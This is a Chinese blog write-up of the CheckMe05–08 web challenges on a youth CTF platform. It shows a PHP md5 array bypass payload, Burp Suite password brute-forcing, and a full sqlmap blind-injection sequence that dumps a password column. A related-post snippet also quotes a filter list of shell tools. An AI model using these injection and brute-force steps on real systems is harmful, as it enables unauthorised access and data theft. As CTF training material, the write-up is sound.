[青少年CTF]Web-CheckMe05-08 writeup by q1jun

已于 2022-11-29 10:49:24 修改
阅读量791 收藏 2
点赞数
分类专栏: Web 文章标签: php nginx 服务器
于 2022-11-29 00:44:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ShangYaoPaiGu/article/details/128090164
版权

0x01 CheckMe05

题目源码:

  <?php
        $a=$_GET["a"];
        $b=$_GET["b"];
        if($a!==$b && md5($a)===md5($b)){
            echo($flag);
        }
    ?>

强类型比较,当给md5()提供的变量为数组时,返回null,则有null === null,这样可以绕过强类型比较

所以最终payload:

GET /?a[]=1&b[]=2

image-20221128234313279

0x01 CheckMe06

下载题目给的附件📎:list.txt

进入环境使用Burpsuite或者yakit抓包,用户名为admin

爆破密码:

image-20221128234842988

在返回包中得到flag

0x01 CheckMe07

进入环境,还是登入页面。

usernamepasswordfuzz一下直接出flag:

image-20221128235940478

0x01 CheckMe08

这题演示一下使用sqlmap的基本步骤

还是那个登入页面,使用burpsuite抓包,右键抓的数据包选择copy to file

image-20221129000335046

然后使用sqlmap,测试出这是时间盲注:

❯ sqlmap -r "/Users/q1jun/Downloads/post.txt" --dbs

这题中如果看不懂英文,一路回车即可,该命令如果sqlmap测试成功,则会返回数据库名。

image-20221129001034116

爆表名:

sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql --tables

image-20221129001211512

爆列名:

sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql -T user --columns

image-20221129001611330

查看password列的数据,拿到flag:

sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql -T user -C password --dump

image-20221129002854913

q1jun
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战 使用PHPWeb中进行CTF挑战 链接: :
De1ctf 2020 -‘check in’ writeup
01-09
这道题很有意思,考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过 文件内容过滤了很多字符 perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents! ...
CTF_平台练习
qq_59826623的博客
09-17 188
把index.php用base64编码两次、hex编码一次,输入到url参数中,即可查看本题源码,进行分析。因为在源码中可以看到过滤了flag所以需要使用f*来查看。目录穿越去访问根目录下的flag。同时传递参数的位置是通过get方式传递pop的参数值。此处交由chatgpt进行分析,以下是他的回答。发现应该不是当前目录下的flag.php文件。很简单,直接上蚁剑,在根目录下查看flag。滑到页面底部找到flag。尝试sqlmap跑一手。linux系统,尝试。根据用户名提示登录网页。读取flag.php
Kali Linux中BurpSuite工具爆破密码详解
qq_64868579的博客
08-13 5706
Burpsuite是一个用Java编写的Web应用程序测试工具,它提供了许多功能。Burp Suite是一套通过攻击模拟来进行Web应用程序漏洞扫描、测试、攻击和漏洞修复的著名工具
[青少年CTF]CheckMe06-07|PingMe02|2048|简简单单的题目|BASE
明裕学长的博客
03-17 1527
得到提示flag2的压缩包密码为二维码解开后在开头加上qsn即可拿到flag压缩包。在结合Free_File_Camouflage工具解开图片中的2.txt。之后对key.txt解密是盲文得到qsnCTF9999。将它复制到js在线运行一下弹窗获得flag。二维码在ps中按ctrl+i黑白反转。将中括号去掉然后结合python。第一个解出密码为qsnctf。另一张改高度得到 我沉醉了。使用字典对登录界面爆破。该题使用万能密码即可。按照里面的提示去解密。
[青少年CTF]misc-Simpleness writeup by q1jun
ShangYaoPaiGu的博客
11-29 564
想到这可能是中文电码(因为要让它变成汉字。
qsnctf CheckMe06 wp
arcuied
11-10 351
qsnctf CheckMe06 wp
使用fastcoll生成字符串MD5碰撞
克格莫
06-24 6120
CTF的时候会遇到诸如$a!=$b&&md5($a)===md5($b)的题。 这就要求我们找到这样的两个字符串a和b,内容不同,但md5值相同。这就涉及到md5的碰撞。 我们使用fastcoll来快速生成这种碰撞。 1.建立一个a.txt,内容如下: 2.将这个文件拖到fastcoll_v1.0.0.5.exe上,等于使用fastcoll打开它。 3.fastcoll会自动生成两个文件: 这两个文件内容不同,但是md5值是相同的。 然后我们写一个php脚本根据生成的文件生成碰撞的字符
青少年ctf CheckMe01~08
qq_44640313的博客
01-09 1036
qsnctf CheckMe01~08的wp
[青少年CTF]CheckMe05
明裕学长的博客
03-17 122
三个等号,意为强类型比较,但是没有对传入数据进行类型判断,所以我们使用数组绕过即可。
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
qsnctf CheckMe07 wp
arcuied
11-10 318
qsnctf CheckMe07 wp
PHP—MD5和sha1绕过
cosmoslin的博客
10-26 6554
1 数组绕过 对于php强比较和弱比较:md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 <?php $a=$_GET['a']; $b=$_GET['b']; if ($a!==$b && md5($a)===md5($b)){ return "hahaha"; } 使用: ?a[]=1&b[]=2 2 0e绕过弱比较 对于某些特殊的字符串加密后得到的密文以0e开头,PHP会当作科
Yakit Web Fuzzer 终极能力强化:热加载 Fuzz
小王的储物间
02-17 872
我们在 Web Fuzzer的高级使用中,已经很习惯于这类操作,在我们最新的热加载特性中,我们新增一个“热加载标签” 的功能。在大家进入编辑界面后,将会看到标签的调试内容。我们实际在定义时,可以通过如下案例直接定义// 定义只有一个返回值的渲染标签// 定义一个返回多个渲染结果的标签// 定义一个返回多个渲染结果的标签(复杂逻辑)定义一个返回值或者多个文本返回值都会生效,定义多个返回值的话,会为每一个返回值生成数据包并在 Web Fuzzer 中执行发送。
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3575
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
[青少年CTF]Web-CheckMe01-04 writeup by q1jun
ShangYaoPaiGu的博客
11-29 1805
在是科学计数的语法,0e后面不管多大都是0。那说明还可以通过日志来解析PHP语句。字符进行base64编码才能使。这里通过0e截断可以做到,因为。但是还是可以读取到文件,比如。这题把php伪协议过滤了。然后再通过文件包含漏洞访问。只能为数字,然后他们各自的。值如果想等就输出flag。还是文件包含题目,相比于。语句的http请求来写入。来拦截请求包,修改里面的。php伪协议可以查看到。
如何同步管理1000个设备的VLAN数据?
最新发布
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
青少年ctf web unserialize
08-28
青少年 CTF(Capture The Flag)比赛是一个针对青少年的网络安全竞赛。在 CTF 中的 Web 题目中,可能会涉及到反序列化(unserialize)漏洞。 反序列化漏洞是一种常见的安全问题,它发生在将数据从序列化的状态...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值